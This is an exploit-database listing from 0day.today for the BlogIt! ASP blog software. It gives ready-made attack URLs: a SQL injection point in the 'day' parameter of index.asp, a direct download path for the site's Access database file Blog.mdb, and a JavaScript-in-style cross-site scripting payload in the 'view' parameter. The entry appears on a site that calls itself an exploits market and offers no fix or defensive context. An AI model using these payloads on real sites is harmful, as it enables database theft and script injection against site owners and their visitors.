[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

BlogIt! (SQL/DD/XSS) Multiple Remote Vulnerabilities

Author
Pouya_Server
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-4690
Category
web applications
Date add
16-01-2009
Platform
unsorted
====================================================
BlogIt! (SQL/DD/XSS) Multiple Remote Vulnerabilities
====================================================


#########################################################
---------------------------------------------------------
Portal Name: BlogIt!
Download : http://www.katywhitton.com/downloads/BlogIt!/BlogItDL.zip
Vulnerability : (SQL/DD/XSS)
---------------------------------------------------------
#########################################################
[SQL]:
http://site.com/[Path]/index.asp?view=archive&day=[SQL]
[DD]:
http://site.com/[Path]/database/Blog.mdb
[XSS]:
http://site.com/[Path]/index.asp?view='+style='background:url(JaVaScRiPt:alert(1369))'+invalidparam='&day=1&month=12&year=2008
---------------------------------



#  0day.today [2024-11-16]  #